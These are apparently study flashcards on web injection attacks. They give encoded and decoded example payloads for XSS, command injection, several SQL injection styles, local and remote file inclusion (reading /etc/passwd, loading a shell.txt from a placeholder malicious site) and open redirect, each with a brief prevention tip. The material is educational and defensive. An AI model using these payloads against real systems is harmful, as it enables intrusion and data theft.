Injections and how to stop them Flashcards
Example of injection:
Search=Bob”%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e
Human Readable (HTML encoding translated):
Search=Bob”><img src=a onerror=alert(1)>
Type of injection:
Reflected Cross Site Scripting
How to prevent:
Input Sanitize “,’,<,;<>,-,
Example of injection:
#inner-tab”>
alert(1)
Human Readable (HTML encoding translated):
#inner-tab”>
alert(1)
Type of injection:
DOM-based Cross Site Scripting
How to prevent:
Input Sanitize “,’,<,;<>,-,
Example of injection:
Site=www.exa’ping%20-c%202010%20localhost’mple.com
Human Readable (HTML encoding translated):
Site=www.exa’ping –c 2010 localhost’mple.com
Type of injection:
Command inject
How to prevent:
Input Sanitize “,’,<,;<>,-,
Example of injection:
Item=widget’;waitfor%20delay%20’00:00:20’;–
Human Readable (HTML encoding translated):
Item=widget’;waitfor delay ‘00:00:20’;–
Type of injection:
SQL Injection (Stacked)
How to prevent:
Paramertized Queries
Example of injection:
Logfile=%2fetc%2fpasswd%00
Human Readable (HTML encoding translated):
Logfile=/etc/passwd
Type of injection:
Local File Inclusion
How to prevent:
Input Sanitize ..,./,sandbox requests
Example of injection:
Logfile=http%2f%2fwww.malicous-site.com%2fshell.txt
Human Readable (HTML encoding translated):
Logfile=http://www.malicous-site.com/shell.txt
Type of injection:
Remote File Inclusion
How to prevent:
Input Sanitize ..,./,sandbox requests
Example of injection:
Item=widget%20union%20select%20null,null,@@version;–
Human Readable (HTML encoding translated):
Item=widget union select null,null,@@version;–
Type of injection:
SQL Injection (Union Based)
How to prevent:
Parameterized Queries
Example of injection:
Redir=http:%2f%2fwww.malicious-site.com
Human Readable (HTML encoding translated):
Redir=http://www.malicious-site.com
Type of injection:
URL Redirect
How to prevent:
Preventing Exteranl Calls
Example of injection:
Item=widget’+convert(int,@@version)+’
Human Readable (HTML encoding translated):
Item=widget’+convert(int,@@version)+’
Type of injection:
SQL Injection (error Based)
How to prevent:
Parametrized Queries
Example of injection:
Lookup=$(whoami)
Human Readable (HTML encoding translated):
Lookup=$(whoami)
Type of injection:
Command Injections
How to prevent:
Input Sanitization ‘,;,;$,{,},(,)